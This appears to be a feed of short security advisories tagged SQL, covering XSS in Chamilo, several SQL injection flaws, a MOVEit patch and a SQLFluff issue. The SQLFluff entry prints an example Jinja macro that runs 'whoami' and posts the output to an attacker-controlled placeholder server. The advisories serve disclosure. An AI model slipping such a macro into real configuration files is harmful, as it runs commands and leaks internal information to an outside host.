#sql

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the skills wheel.

Chamilo 1.11.x up to 1.11.20 allows users with admin privilege account to insert XSS in the session category management section.

ai-dev aicombinationsonfly before v0.3.1 was discovered to contain a SQL injection vulnerability via the component /includes/ajax.php.

Cross Site Request Forgery (CSRF) vulnerability in MultiTech Conduit AP MTCAP2-L4E1 MTCAP2-L4E1-868-042A v.6.0.0 allows a remote attacker to execute arbitrary code via a crafted script upload.

Progress Software has announced the discovery and patching of a critical SQL injection vulnerability in MOVEit Transfer, popular software used for secure file transfer. In addition, Progress Software has patched two other high-severity vulnerabilities. The identified SQL injection vulnerability, tagged as CVE-2023-36934, could potentially allow unauthenticated attackers to gain unauthorized

A vulnerability was found in SourceCodester Shopping Website 1.0. It has been classified as critical. Affected is an unknown function of the file check_availability.php. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-233286 is the identifier assigned to this vulnerability.

jSQL Injection is a lightweight application used to find database information from a distant server. jSQL Injection is also part of the official penetration testing distribution Kali Linux and is included in various other distributions like Pentest Box, Parrot Security OS, ArchStrike and BlackArch Linux. This is the source code release.

Lost and Found Information System version 1.0 suffers from a remote SQL injection vulnerability.

AGVirtues Galeria version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

### Impact In environments where untrusted users have access to the config files (e.g. `.sqlfluff`), there is a potential security vulnerability where those users could use the `library_path` config value to allow arbitrary python code to be executed via macros. Jinja macros are executed within a [sandboxed environment](https://docs.snowflake.com/en/sql-reference/sql/show-warehouses) but the following example shows how an external url might be called and used to reveal internal information to an external listener: ```ini [sqlfluff:templater:jinja] library_path = /usr/lib/python3.9/http [sqlfluff:templater:jinja:macros] a_macro_def = {{client.HTTPSConnection('<SOME_EXTERNAL_SERVER_YOU_CONTROL>').request('POST', '/', server.os.popen('whoami').read())}} ``` For many users who use SQLFluff in the context of an environment where all users _already have fairly escalated privileges_, this may not be an issue - however in larger user bases, or where SQLFluff is bundled into another tool whe...